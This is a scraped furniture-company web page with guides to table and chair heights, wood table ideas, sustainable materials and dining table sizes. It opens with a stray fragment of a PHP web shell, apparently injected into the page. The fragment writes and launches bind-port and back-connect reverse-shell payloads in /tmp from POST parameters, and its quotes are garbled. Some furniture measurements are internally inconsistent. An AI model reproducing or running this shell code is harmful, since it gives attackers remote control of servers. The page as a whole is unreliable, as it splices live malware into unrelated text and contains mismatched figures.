echo “<pre class = ml1> $?”. ex (“ps aux | grep bp”). “</ pre>”;
}
if ($ _ POST [‘p1’] == ‘bpp’) {
cf (“/ tmp / bp.pl”, $ bind_port_p);
$? = ex (which (“perl”). “/tmp/bp.pl”. $ _ POST [‘p2’]. “&”);
echo “<pre class = ml1> $?”. ex (“ps aux | grep bp.pl”). “</ pre>”;
}
if ($ _ POST [‘p1’] == ‘bcc’) {
cf (“/ tmp / bc.c”, $ back_connect_c);
$? = ex (“gcc -o / tmp / bc /tmp/bc.c”);
@unlink (“/ tmp / bc.c”);
$? . = ex (“/ tmp / bc”. $ _POST [‘p2’]. “”. $ _ POST [‘p3’]. “&”);
echo “<pre class = ml1> $?”. ex (“ps aux | grep bc”). “</ pre>”;
}
if ($ _ POST [‘p1’] == ‘bcp’) {
cf (“/ tmp / bc.pl”, $ back_connect_p);
$? = ex (which (“perl”). “/tmp/bc.pl”. $ _ POST [‘p2’]. “”. $ _ POST [‘p3’]. “&”);
echo “<pre class = ml1> $?”. ex (“ps aux | grep bc.pl”). “</ pre>”;
}
}
echo ‘</ div>’;
hardFooter ();
}
if (empty ($ _ POST [‘a’]))
if (isset ($?) && function_exists (‘action’. $?))
$ _POST [‘a’] = $ ?;
else
$ _POST [‘a’] = ‘FilesMan’;
if (! empty ($ _ POST [‘a’]) && function_exists (‘action’. $ _POST [‘a’]))
call_user_func (‘action’. $ _POST [‘a’]);
?>

A Guide to Standard Table and Chair Heights

Average standard table heights vary between countries and companies, so it’s important to check supplied dimensions before buying furniture online, or take your own measurements. You can also contact your contractor to take measurements of your space and offer recommendations on the best dining table height and size for your design.

Matching your table and chair height is important for guests to feel natural and have space to move their elbows and cross their legs. Below we list the general standard table and counter heights for dining, kitchens, living rooms, offices, bathrooms and more. You can also read how to calculate the best table size for your room.

What Is Standard Table Height?

There is no exact industry standard for table height, although many companies produce furniture in line with average table and chair heights sold in their country.

In any case, doing your own measurements and calculations are important, especially if you’re trying to match table and chairs from different suppliers. If you’re opting for custom furniture, below we explain in detail how to calculate table and chair height are below.

Average Table
Height Range
Standard Table
Height (inches)
Standard Table
Height (cm)
Standard dining table height 28–30 inches30 inches76cm
Standard kitchen table height 28–30 inches30 inches76cm
Standard counter height 34–39 inches36 inches91.5cm
Standard bar table height 40–43 inches42 inches106.5cm
Standard coffee table height 18–20 inches20 inches51cm
Standard side table height 22–30 inches25 inches63.5cm
Standard console table height 24–42 inches30 inches76cm
Standard nightstand height 24–28 inches25 inches63.5cm
Standard office desk height 28–30 inches29 inches73.5cm
Standard bathroom counter height30–36 inches32 inches81cm

What Is Standard Chair Height?

Similar to table height, there is no definite industry standard for chair heights.

Chair heights generally range up to 17–19 inches (43–48cm) from the chair leg to the top of the seat, while stool heights can range from 16–23 inches (40–58cm) due to their minimalism. These chair heights are standard to fit under tables from 28–30 inches (71–76cm). You should also account for any apron (support beam) under the table.

For comfortable seating, it is recommended to allow at least 9–13 inches (23–33cm) between your table or counter and the chair seat, with 12 inches (30.5cm) being a spacious allowance.  This allows guests to comfortably cross their legs under the table.

Average Chair
Height Range
Standard Chair
Height (inches)
Standard Chair
Height (cm)
Dining table chair heights 17–19 inches 18'45–50 cm
Kitchen table chair heights 17–19 inches18'45–50 cm
Desk chair heights 17–19 inches 18'45–50 cm
Counter chair heights 24–26 inches 24' 61cm
Bar chair heights 28–32 inches 30' 76cm

Calculating Standard Table & Chair Heights

Below are some examples of comfortable chair heights to match certain standard dining heights. For more space, consider stools or benches as a seating choice.

Standard Dining
Table Heights
28 inches29 inches30 inches32 inches36 inches40 inches42 inches
Standard Chair Heights15–19' 16–20' 17–21' 19–23' 23–27' 27–31' 29–33'

How to Measure Table Height

Standard table height measurements are taken from the floor to the top of the table or counter. This means you need to consider a lower chair height if you have a thick table top or overhanging counter.

How to Measure Chair Height

Standard chair heights are measured from the chair legs to the top of the seat surface. You do not include the height of the chair back or armrests in your measurements, unless you plan to slide chairs fully under the table or counter.

If you are choosing chairs with armrests, allow around 7 inches (18cm) between the armrest and the underside of your table or apron.

Bench seating is measured in the same way. The ADA sets a standard bench seat height of 17–19 inches (43–48cm) above the floor.

Standard Dining Table Height

Standard Dining Table Height

The standard dining room table height is around 28–30 inches (71–76cm) from the ground to table top surface.

Formal dining tables tend to be closer to 30 inches, while informal dining table heights average around 29 inches tall. Older tables also tend to be lower, around 28–29 inches.

Varying the height of a standard dining height can feel unnatural, however slight. This is sometimes caused by placing a very thick table top onto a standard base height, so considering these aspects is especially important when deciding measurements for custom furniture.

Low Dining Table Height

If you opt for lounge-style or low seating – with seat heights below 16 inches (40cm) – you may be able to fit a lower dining table height of around 26 inches (66cm).

Standard Kitchen Table Height, Islands and Counters

Kitchen table heights are the same as dining table heights, around 30 inches (76cm).

However, if you want seating for a kitchen island or counter, you should consider a taller height. Counter table heights are usually set at 34–39 inches (86–99cm), with 36 inches (91.5cm) being a standard size. Read more on how to calculate the ideal bar or counter stool height.

Standard Kitchen Table Height

Standard Console Table Height

Console tables are often pushed against a wall or behind a sofa, so these aspects influence the standard console table heights. In general, a console table should be not taller than the sofa back height, and can be up to 1 inch (2.5cm) below.

For entry console tables and buffet consoles, aim for around 33 inches (84cm). Otherwise, console tables are typically the same height as dining tables (28–30 inches).

TV consoles are typically higher. For optimal TV viewing height, measure around 42 inches (107cm) from the floor to the TV’s centre and calculate your ideal console height. This allows for a sofa seat height of 18 inches, plus 24 inches which is the general eye-level of an adult in a relaxed seating position.

Standard Coffee Table Height

Coffee tables are usually set at around 18–20 inches (45–50cm) high, to create a comfortable balance between standard sofa and chair heights.

Otherwise, the standard coffee table height is usually the same height as the cushions on your soft, or within 1–2 inches (2.5–5cm) lower.

Other design rules include leaving a walkway space of 12–18 inches (30–45cm) between your coffee table and sofa, plus choosing a coffee table that is around two-thirds the length of your sofa.

Standard Coffee Table Height

Standard Nightstand Height

There is no standard nightstand height as it is typically tied to the height of the mattress. However, the most common bed height is around 25 inches (63.5cm), and most nightstands range between 24–28 inches (61–71cm). Tables don’t have to be identical heights, but should be within 2 inches (5cm) of each to create visual balance.

From a laying position, it is more comfortable to raise your arm than lower it. For this reason, the average nightstand height is measured to line up with the top of your mattress or up to 2–6 inches (5–15cm) higher.

Standard Side Table Height

Standard Side Table HeightSide tables are functional furniture pieces used for lounge seating or hallways, so measurements change depending on surrounding furniture and the function, for example, setting down a drink or placing a lamp.

Standard side table heights are usually designed to be equal to or just below the height of sofa armrests, which are around 25 inches (63.5cm), although this varies widely so exact measurements are important. Most side tables are between 22–30 inches (56–76cm).

A general rule is keep your side table height to within 2 inches of the sofa armrest height; for example, if a sofa arm is 24 inches high, an appropriate side table height would be 22–26 inches. although if you can’t find an appropriate side table height for your sofa, aim for shorter rather taller, to make it easy to set a drink or book down.

If you plan to use the side table for a lamp, choose a side table height so that the base of the lampshade isn’t higher than eye level when seated next to it. If the lamp won’t be at an eye-level, consider a side table height that works with surrounding furniture, lamp size or ceiling height.

There are exceptions where taller side tables can work, for example, if there is a set of side tables where at least one is below the armrest height, or the side table serves another function in a high-ceiled room or hallway.

If your sofa has no armrests, calculate the standard side table height in line to where the arms would be, or choose a table at the same height as the seat height.

Standard Bathroom Counter Height

If you’re installing a bathroom counter, the standard height is around 34–35 inches (86–89cm). If you plan to install a built-in vanity, you may consider lowering it to the standard 30 inches, for chairs with a seat height of 17–19 inches.

Bathroom vanity cabinets are usually a standard height of 32 inches (80cm), although range from 30–36 inches. Newer, modern vanities are sometimes higher, starting at 36 inches (91cm), referred to as ‘comfort’ vanities because you don’t need to bend to wash your hands.

The Americans with Disabilities Acts sets the minimum and maximum standard vanity heights at 29–34 inches (with built-in sinks).

Standard Bar Table Height

Bar tables range in height from 40–43 inches (102–109cm), although 42 (107cm) is a typical standard bar table height. You can comfortably customize a bar table height up to 44–47 inches (112–119cm) for an modern look, although consider a higher bar stool height as well. We provide a table of standard bar stool heights.

Standard Office Desk Height

Most work desk heights are between 28 and 30 inches, which is really only a suitable height for people from 5 ft 8 inches to 5 ft 10 inches (173–178cm) with a conventional desk chair. Standard desk chair heights range from 16–21 inches (40–53cm).

This is obviously not an ergonomic option for everybody. If you are taller or shorter, consider a different desk height, rather than choosing a different chair. Adjustable desks, for example, allow a range of 22–33 inches (56–84cm).

The Proper Office Desk for Your Height

If you spend long hours sitting, the right office desk height is important for comfort and posture.

Your desk and chair height should be matched so that in a seating position, your arms rest at a comfortable 90 degree on the desk. To find the right position, the chair should be adjusted so the seat top sits just below your knee cap. When you sit at the table, your knees should also be at a 90 degree angle, with your feet flat on the floor.

Standard Standing Desk Height

The same rule applies for determining the ideal standing desk height; your arms should rest at a perfect 90 degree angle on the table when standing beside it.

Custom Table and Chair Heights

If you’re having trouble matching table and chair heights from standard furniture collections, consider custom furniture as a solution. Custom wooden furniture, for example, can be easily adapted to fit with modern chair designs, or vice versa.

 

© Parotas.com

PAROTAS is a team of carpenters, designers and architects who focus on producing sustainable wooden furniture. We use certified parota wood sustainably sourced from Mexico. Contact PAROTAS to ask about custom wooden furniture or design project.

Read more:

How to calculate the best dining table size for your room

What are the most sustainable materials – for building, furniture and design projects?

Unique Wood Table Ideas for Modern Designs

There are many ways to fit wood table ideas into modern and contemporary designs. Wooden tables are timeless pieces making them one of the most sustainable furniture choices, especially simple and minimalist table designs that stay in style for generations.

To narrow down your wood table ideas, consider how to create visual balance in your room. You will need to account for the room size, seating capacity you want, seating space per person, and other variables, such as other furniture in the room or mat size. We explain below how to calculate the space needed for visual design, to help you choose the best wooden table for your space.

Quality is also an important factor: solid wood tables last much longer than low-quality wood composites, and are more environmental as composites usually contain harmful products, like glue and synthetic materials. Some question whether the extra cost of solid wood is worth it, especially with today’s market flooded with cheaper, low-end alternatives, such as veneer, metal or plastic furniture. Solid wood furniture, however, is the only material that ensures longevity, due to easy maintenance. Signs of wear and tear or damage to a wooden table can be easily sanded out, and maintenance is as simple as reapplications of oil. It is also the most sustainable furniture choice when compared to plastic or metal furniture.

Below are some tips for narrowing down your wood table ideas, plus images showing wooden table ideas incorporating modern design. You can also read how to calculate the right dining table size for your room, standard table and chair heights, or counter and bar stool heights for a modern look.

Wood Table Ideas & Images

Wood table idea

Wooden tables can be made with natural wood slabs or panels of solid wood (see image below), and modernized with a range of sleek wooden bases or metal structures.

When calculating your ideal wood table size, you should allow a minimum size of 32–36 inches (80–90cm) between your table and the wall or any obstructions. This is also a comfortable size needed for someone to push back their chair. If you have furniture along the wall, start your measurements from the edge of the furniture instead. Other obstructions to consider are door frames, fireplaces and windows.

The ideal distance for an elegant look, however, is estimated at around 42 to 48 inches (107–122cm) from the wall or furniture. It is advised not to exceed a maximum of 70 inches (180cm) between the wall – instead choose a larger table to fill the space for better visual balance.

In terms of seating space per person, the minimum space required is around 24 inches (60cm), although up to 30 inches (80cm) per person allows more elbow room. If you choose a rectangular table, you also need to add a minimum of 12 inches (30cm) up to 24–30 inches (60–80cm) at either end, to allow enough leg room for two extra spaces.

You will need a minimum space of at least 24 inches (60cm) behind a chair when it is pushed in, which is the minimum amount needed for someone to pass.

Your total table size should also account extra space for table leg width. If you have a smaller room, opt for wooden table ideas that have thin legs or a central pedestal base.

Wood Furniture Ideas

Solid Wood Table Top Ideas

Natural cuts made from solid wood create truly one-of-a-kind wooden table ideas, relying on the unique patterns and live edge borders that only Mother Nature can provide. Solid wood tables are sometimes associated with rustic-style furniture, however, PAROTAS uses a variety of design bases to modernize wooden table top slabs.

When calculating the ideal height for your base structure, allow room for at least the standard chair height, typically around 18 inches (45cm) – from floor to chair seat – plus lap room. A comfortable fit between the chair seat a wooden table top is calculated at around 12 inches (30cm).

If you’re choosing between a round or rectangular natural wood table, you should consider the room size and the desired seating amount.

Rectangular table tops work better in long narrow rooms to create visual space. If you need to save space, you can add a wooden bench on at least one side, or both, which can be pushed under the table to allow more walking room.

Circular tables are ideal for small spaces for allowing better flow around the table, plus more people can fit without corners, especially if the table has a pedestal base.

Some people prefer oval or rectangular tables for seating large groups, as wide circular tables can make it difficult to reach food in the middle – although a built-in lazy susan can resolve this.

In a square room, a round or square table creates the best visual balance, as well as allowing a more intimate dining atmosphere as everyone is the same distance apart and facing each other. Similar to circular tables, however, large square tables can make it difficult to reach for food.

Solid Wood Coffee Table Ideas

Wood Table Top Ideas

Modern Wood Dining Table Ideas

If you’re specifically looking at dining table ideas, you should first calculate the amount of people you want to seat and the kind of plate setting.

The minimum depth to fit a dining plate and cutlery is around 15 inches (38cm; without glass space), or 18 inches (45cm) for a full cutlery and plate setting with glasses. You should ideally add an additional 10–12 inches (25–30cm) to fit serving dishes, although 6 inches (15cm) is the minimum and sufficient if you move glasses. This puts the ideal table width at around 41 inches (105cm), with 47 inches (120cm) being a more comfortable width.

A walkway of 36 to 42 inches (91–107 centimeters) around the entire table is the most comfortable space needed when chairs are occupied and people want to pass. However, if your table will be in an open plan room with circulation routes, then leaving from 48 to 60 inches (122–152cm) beyond the edge of a table is suitable for this type of layout.

If space is an issue, using chairs without arms or swivel seats will be more comfortable for guests. Another tip to make a small area seem more spacious is to use transparent, acrylic chairs.

Round tables are also one of the best choices for small space. With no sharp corners to bump into, round tables can fit into tight spaces and typically squeeze in more people. Round tables also create the most intimate atmosphere, as everyone can interact without having to lean over anybody. But for entertaining big crowds, large round tables are not as ideal as sound doesn’t travel as well as across a huge diameter, in which case rectangle tables can be ideal.

Wood Dining Table Ideas

Wood Coffee Table Ideas

The same basic spacing principles for dining tables applies to wooden coffee tables, making sure you leave enough space for people to pass and that there is enough space between your coffee table and the closest obstruction, such as a sofa.

The easiest design rule is to keep the proportions similar between your table and the room. Long, narrow rooms work best with rectangular tables while round and square tables fit best with a square rooms.

If you have a very large room, try to also allow a more generous clearance space, even up to 48–54 inches (122–137cm).

Wood Coffee Table Ideas

Glass Wood Coffee Table Ideas

Wooden Table Leg Ideas

Solid wood tables generally require sufficient support to withhold the weight, although minimalist base designs are still possible. Choosing a lighter wood – for example, parota is almost half the dried weight of oak – can provide more flexibility in designing table legs.

You also need to account for the ‘apron’ – the panel hanging underneath the table top. If you have a low apron, guests might not be able to cross their legs, or you would need to choose lower chairs. Aprons, however, can be beautifully incorporated into your table design idea. At PARTOAS, we custom design table aprons so they add to overall modern design idea.

The position and size of your metal or wooden table legs also influences the space you need. Larger or obstructive table legs naturally limit the seating space. If space is an issue, pedestal bases in the center are an idea choice for offering the most legroom, and you might be able to squeeze in an extra seat.

Wooden furniture ideas

Wood Table Leg Ideas

Custom Wooden Table Ideas

Every space is different. Custom wood furniture is the ideal solution for achieving perfect visual balance in a room, allowing you to match natural wood cuts to fit unique spaces in your design. For custom home furniture and contract projects, PAROTAS’ team of carpenters, architects and designers bring together their expertise to turn custom wooden ideas into reality, offering advice on the best solutions for your space and viability of your design. If you have a wooden table idea or design project, contact us for a quote.

 

© Parotas.com

PAROTAS brings together carpenters, designers and architects to find sustainable ways to produce custom wooden furniture. Our carpenters employ specialied techniques to reduce wood waste during production. All wood is certified. Contact PAROTAS to ask about your custom wooden furniture or design project.

Read more:

How to calculate the best dining table size for your room

Standard Counter & Bar Stool Height for a Modern Look

A Guide to Standard Table and Chair Heights

 

What Is the Most Sustainable Material – for Building, Furniture and Design Projects?

Which are the most sustainable materials to use? Designers are increasingly considering environmental aspects in their projects, finding ways to reduce their carbon footprint and make better choices when choosing sustainable materials. Today there are certifications and eco-labels to help both designers and consumers identify sustainable materials in the market. However, as eco-labels are still far from being the norm, how can you intrinsically know what is a sustainable material? Below you can find out the environmental impacts of different building, furniture and design materials.

Sustainable materials

PAROTAS has created the infographic below looking at the environmental impact of different materials commonly used in building, furniture and design projects, including plastic, concrete, metal and wood design. The answer to which is the most sustainable material may surprise you!

Most Sustainable Materials

 

However, the real picture of each sustainable material is much more complex, and some companies instead find ways to offset their carbon footprint in contrast to finding alternative production materials.

The energy used and pollution output can also vary depending on the material type (for example, there is a wide variety of plastics) and whether it is made from recycled or reused resources, as is common with steel, aluminium and plastic, which decreases the energy required and boosts their position as a sustainable material.

In all cases, your environmental impact can be reduced by reusing or reclaiming resources, being of the most sustainable options in design. If required to use new furniture or materials, then high quality products are the most sustainable materials, particular if you can reuse or recycle them in future.

Feel free to share our infographic, provided you include a link to the CC-licence, original post and to www.parotas.com.

 

© Parotas.com

PAROTAS brings together carpenters, designers and architects to find sustainable ways to produce wooden furniture. Our carpenters employ specialised techniques to reduce wood waste during production, as well as re-use all offcuts and by-products. All wood is certified. You can contact PAROTAS to ask about your custom wooden furniture or design project.

How to Calculate the Best Dining Table Size for Your Room

What is the exact dining table size you need to create visual balance in your design?

Before starting your furniture search, you should calculate the range of dining table sizes that can fit in your room based on design principles, which can vary between round, square and rectangle table sizes. Besides considering how many people you want to seat, your dining table size also needs to allow enough space for people to pass, fit a dining setting, and be proportional to the room size to create visual balance.

If you need help calculating your dining table size, contact PAROTAS to ask what would be the best table design for your space and seating requirements. You can also read how to calculate the ideal chair and table height, or see a list of standard bar and counter stool heights.

Dining table size guide

Calculate the minimum and maximum dining table size for your room dimensions, taking into account:

  • Dining table size compared to room size
  • Dining table size compared to rug size
  • Standard dining table height and chair height
  • Calculate dining table size by seating
  • 2 seater dining table size
  • 4 seater dining table size
  • 6 seater dining table size
  • 8 seater dining table size
  • 10 seater dining table size
  • 12 seater dining table size
  • Round, square and rectangle dining table sizes

 

Dining Table Size

What dining table size should I buy?

Before deciding how many people you want to seat, you will need to see what size dining table will actually fit into the space you have, taking into account walls, walkways and other furniture.

To ensure you have adequate room around a dining table, a amount minimum of 30–36 inches (76cm) if required for clearance space, measured from the nearest obstruction, whether it be a wall, door, window or furniture. Although, a 30-inch space around your dining table size can still create a tight fit if people need to get up during the meal.

For a more comfortable space around your dining table size, opt for up to 42–48 inches (122cm), which also creates an elegantly proportioned room.

To ensure you don’t choose a dining table size that is too small for your room, don’t leave more than 6ft (183cm) from the edge of the room, at least on one side.

When deciding on your ideal dining table size, consider that ‘less is more’ if you’re looking for a comfortable, spacious room. Taking into account these measures, you might find switching from a 10-seater to an 8-seater dining table size creates a better fit, for example, or from a rectangle to a round dining table size. Another option is to choose a table with fold-out leaves – ideal if you only host large groups occasionally – provided it still fits when expanded.

When deciding between a square, rectangle or round dining table size, your choice should be proportional to the shape of the room but also the amount you want to seat. For example, conversation can become difficult with tables measuring more than 7 feet wide (2m, similar to the distance that applies to the conversation area in a living room), which is what you would need if you’re considering a round or square table to seat more than eight. The bigger the table, the more dining parties are restricted to conversations with the person next to them, rather than across the table. In some cases, it can be better to consider an alternate shape, for example, a rectangle dining table size.

If you want to visualize the space your table will take, a tip is to place a sheet on the ground or create an outline with masking tape.

To give an example, in a room measuring 10 x 12 feet (3 x 3.6m), it would be possible to fit a rectangle table size of 36–42 inches wide (91–107cm) and up to 60–70 inches long (152 x 178cm), or a square or round table size of around 48 inches in diameter (122cm), allowing for additional furniture along one wall.

Dining table size compared to rug size

If you’re matching a table with a rug, you will need to make sure the rug is at least 30 inches longer than your dining table size on each side where there will be chairs.

If you use a rug 30-inches longer than your table – thus occupying the recommended space for free movement – then you should try to allow for at least 48 inches from your table to the wall to create visual balance.

Dining table height

Even though dining table designs vary considerably, the standard dining table height is usually pretty consistent. You need to ensure there is enough space for people to fit – and cross – their legs, without being too high that it becomes uncomfortable to eat. In general, you should leave at least 12 inches (30cm) between your chair seat and the tabletop.

Standard dining table heights range from 28 to 30 inches (71–76cm), which should be matched with a chair height of 18 to 23 inches (46–58cm, from floor to seat top), benches or stools. The shape of your table, however, can influence your chair and dining table height. Some tables have a support on the under side, which increase the distance required for legs.

If you’re considering a counter-height table, where people might stand or sit on high wooden stools, the standard dining table height is 34–36 inches (86–91cm) and should be used with chairs measuring 24–26 inches (61–66cm) from floor to seat.

If you opt for a bar table, standard table heights range up to 40–42 inches (102–117cm), with stools ranging from 28–30 inches (71–76cm).

Dining table size based on seating

Each person needs a minimum of around 24 inches (61cm) to eat comfortably, although some tables and chair designs (such as wooden benches) can allow more people to squeeze in when required. However, for a comfortable table surface, consider up to 28–30 inches (71–76cm) for more elbow room, especially if you have chairs with armrests or wide seats. In rectangular tables, you also need to calculate an extra 12 inches (30cm) for each end if you want to place seating at the head and foot of the table.

You will also need to consider the minimum depth required for a dining setting, plus some space for a shared area to place food, condiments or candles. To fit a basic plate setting allow for a minimum of 15 inches (38cm) deep, plus a minimum of around 5 inches (13 cm) for shared space (per person, or double for full table calculations).

To allow more room for your guests, as well as enough space for a full dining setting (including a bread plate and two glasses), then consider a table space of 30 inches wide (76cm) and 18 inches deep (46 cm), with a shared space of up to 9 inches (23cm) per person.

You be careful not to create too much distance, though; large round tables, for example, can make it difficult to reach food, while rectangular shapes can work better for seating large groups.  If you do opt for a round table wide than 60 inches in diameter (152cm), you might consider adding a lazy susan to your table design.

Using the above dimensions, a rectangular dining table size for six would be calculated at around 78 x 40 inches (203 x 102cm), or 96 x 54 inches (244 x 137cm) for a more comfortable setting.

If you don’t plan to put food or decorations on the table – for example you have a side console table – or don’t mind moving glasses around, then there’s no need for calculating in shared space. If you sacrifice shared space, it’s possible to create a dining table size as narrow as 36 inches (91cm), which is still enough space to put a bottle of wine and some candles, while a sideboard can be used to serve food. In a restaurant, for example, you will often find tables around 36 inches wide (91cm) with very little sharing space.

6 seater dining table sizeBefore calculating what size dining table you need, you need decide if you want to fit in extra seating at the head and end of the table.

What size dining table?

Dining table sizes vary depending on the furniture design. You may be able to fit more people by considering an alternate arrangement, for example, switching from a square to a round dining table.

Below you can see size requirements based on square, rectangle and round dining table sizes, and tips to help you choose which shape would work best based on the seating you want.

2 seater dining table size

The measurements for a two-seater square table need to account for shared space, putting the minimum dining table size at 31 inches (79cm), while a rectangle table for two would need at least 42 x 31 inches (110 x 70cm). If you opted for a 36-inch (3ft; 91cm) round table, however, you could comfortably sit up to three people.

4 seater dining table size

Round dining table size for four

The standard dining table size for four averages 36 to 40 inches (3–4ft; 91–102cm), although a 4-foot round table (102cm) can also squeeze six seats when needed.

While the minimum round dining table size for four starts at 36 inches, a pedestal base works best to allow more room. To allow more room for chairs and leg space, especially if there are table legs, the ideal round dining table size for four is 48–50 inches (4ft; 122cm–127cm).

Square dining table size for four

The ideal four-seater square dining table size is around 43 inches (3ft; 107cm). Similar to a round table, the minimum dining table size can be as low as 36 inches (3ft; 91cm), although you should allow more room – up to 50 inches (4ft; 122cm) – for a better fit and if you have wide table legs. Going up to 60 inches (5ft; 152cm) will allow you to choose between four to six seats.

Rectangle dining table size for four

The comfortable average to seat four is around 60 x 31 inches (152 x 79cm), although this rectangle dining table size could also squeeze six with the right table and chair designs.

To fit four diners on two opposite sides (ie. excluding head and table settings), the minimum area would be 48 inches long by 36 inches wide (122 x 76cm). To sit one diner at each end, the minimum space required would be 48 x 36 inches (122 x 91cm), or 60 x 55 inches (152 x 137cm) for the ideal, comfortable fit.

6 seater dining table size

Round dining table size for six

You will need at least 48 to 60 inches in diameter (4–5ft; 122–152cm) to seat six at a round table, working best with a pedestal base. It is possible to create a tight 6-seater round dining table with a diameter of 44–54 inches, but aiming for 54–­60 inches is a more comfortable fit and may even squeeze in eight.

The minimum round dining table size for six calculates to around 55 inches (140cm), although an ideal size would be 72 inches (6ft; 183cm). From about 60 inches (5ft; 152cm), you can start to squeeze in around seven to eight people, and with a minimal table design a 6-foot table could squeeze up to eight or nine when required.

Square dining table size for six

You will need at least 48 to 60 inches in diameter (4–5ft; 122–152cm) to squeeze in six at a square table (see table measurements for four and eight-seater tables).

Rectangle dining table size for six

It is possible to squeeze six people around a table measuring from 60–72 inches long (5–6ft) and 31–36 inches wide (152cm–183cm x 79–91cm).

To fit six without any diners at either end, the minimum dining table size for six would be 72 x 31 inches  (6ft x 2’6″; 183 x 76cm). To calculate enough space for diners at the head and foot of the table, the minimum size 79 x 36 inches (6’6″ x 3ft; 198cm x 91cm), although to avoid any overlap in dining settings you would need at least 96 x 55 inches (8ft x 4’6″;  244 x 137cm).

8 seater dining table sizeWhen calculating if you can fit an 8 or 10 seater dining table size, you need to add extra space for the legs.

8 seater dining table size 

Round dining table size for eight

The average round dining table size for eight is 72 inches in diameter (6ft; 183cm), although anywhere from 54–60 inches (5ft; 137–152cm) can fit six to eight people. Depending on the design, it is possible to squeeze seven to nine seats on round tables measuring anywhere from 5–7 ft.

The minimum required size is around 5ft (152cm), working best with a pedestal base or simple legs, otherwise the ideal size to allow a full plate setting would be around 7ft (213cm).

Square dining table size for eight

The minimum square, eight-seater dining table size is around 6ft (183cm), although 7ft (214cm) is the ideal size; both sizes, however, can squeeze up to 10 seats.

You could also squeeze up to 12 people around a 7ft table; for a larger square dining table size, you might a rectangular dining table so guests aren’t so far from each other.

Rectangle dining table size for eight

Dining table sizes for eight can range from 72 to 96 inches long by 36 to 43 inches wide (6–8ft x 3ft–3’6″; 183–244cm x 91–110cm), with the lower measurements also a comfortable fit for six seats and the higher measurements suitable to squeeze 10 people. The general standard you’ll come across, though, will be around 78 inches long by 36 inches wide for a eight-seater rectangle dining table size.

With a table of 96 x 29 inches (8ft x 2’6″; 244cm x 76cm), four diners can fit along each side, although you would need at least 103 x 36 inches (8’6″ x 3ft; 259 x 91cm) if you wanted to sit three side-by-side and two diners at each end. The ideal size for the latter arrangement, however, would be 127 x  55 inches (10’6″ x 4’6″; 323 x 140cm).

10 seater dining table size 

Round dining table size for 10

From around 84 inches (7ft; 213cm), you very can fit nine to 11 people, while a 96-inch table (8ft; 244cm) could squeeze from 10 up to 12.

If calculating by plate setting space, the minimum requirement is 7ft (or from around 183cm), while a comfortable size calculates to around 8ft (244cm).

Square dining table size for 10

With the right table and chair design, you could squeeze 10 people onto a square table measuring from 6–8 foot in diameter. Although larger than 7ft and distances start to get a little far for reaching dishes, although a lazy susan can be added in.

Rectangle dining table size for 10

It is possible to fit 10 seats on a rectangle table size of 8–10 feet x 3’6″–4’6″ (244–305cm x 110–140cm).

To seat 10, five side-by-side, you should aim for a minimum length of 10 feet and width of 2 feet 6 inches (305 x 76cm). If you want to include a head and foot setting, aim for 10’6″ x 3 feet (323 x 91cm), or ideally 11′ 6″ x 4’6″ (354 x 140cm) for generous seating space.

12 seater dining table size 

Round dining table size for 12

With a diameter of 8 feet (244cm) you can comfortably fit 10 people, or squeeze in 12 with slightly less elbow space, while you would need around 9 feet in diameter (274cm) to spaciously sit 12 people. With a 9-foot table, you could comfortably fit a range of 11–14 settings, while a 10-foot table (305cm) could sit 12 to 15.

However, with diameters larger than 7 foot (or around 200cm), conversation and reaching for food can start to get difficult, so you might consider a rectangular arrangement.

Square dining table size for 12

A table of 84 inches (7ft; 214cm) could fit 12, although a more comfortable fit would be up to 96 inches in diameter (8ft; 244cm), which can sit anywhere from 8–12 people comfortably. You might find the distance of an 8-foot table, however, interferes with conversation. It is sometimes recommended to consider a rectangular arrangement if you require longer than 7 feet.

Rectangle dining table size for 12

The smallest rectangle dining table size needed to fit 12 seats would be around 120 x 55 inches (10ft x 4’6”; 305 x 140cm), which would also comfortably sit 10.

To seat six side-by-side, the minimum space required would 144 x 31 inches (12ft x 2’6″; 366cm x 76cm). You can create a shorter table by seating two on each end, although would need a minimum size of 127 x 48 inches (10’6″ x 4ft; 320 x 122cm) or ideally 139 x 60 inches (11’6″ x 5ft; 350 x 152cm).

Round Dining Table SizeA round dining table size can work well for six to eight people, as pictured above, but can get too large for conversation if you add space for 10 to 12 people.

Rectangle, oval, square and round table sizes

Below is a table showing the minimum dining table size requirements for each type of dining table shape (not include shared space).

2 seater
dining table size

4 seater
dining table size

6 seater
dining table size

8 seater
dining table size

10 seater
dining table size

12 seater
dining table size

Round dining table sizes
2’6” (76cm) 3ft (92cm) 4’6” (137cm) 5’ (152cm) 7’ (183cm) 8’ (244cm)
Rectangle/Oval dining table sizes
2’x2’6” (61cmx76cm) 4’x2’6” (122x76cm) 6’x2’6” (183x76cm) 8’x2’6” (244x76cm) 10’x2’6” (305x76cm) 12’x2’6” (366x76cm)
Square dining table sizes
2’6” (76cm)(including shared space) 3’ (92cm) 3’–6’ (92cm–183cm) 6’ (183cm) 7’ (214cm) 7’ (214cm)

If you need help calculating your dining table size, send an email to PAROTAS and we’ll be happy to help.

 

© Parotas.com

PAROTAS brings together carpenters, designers and architects to make custom parota wood furniture of even the most ambitious modern designs. The parota tree can be sustainably sourced in its native regions in Mexico and Central America, where it thrives in humid zones. Read more on the sustainability of parota (guanacaste) and the qualities of parota wood or contact PAROTAS to ask about your custom design. You can see the unique colour and grain of parota on our page on live edge wood.

Read more:

Standard Counter & Bar Stool Height for a Modern Look

A Guide to Standard Table and Chair Heights

What are the most sustainable materials – for building, furniture and design projects?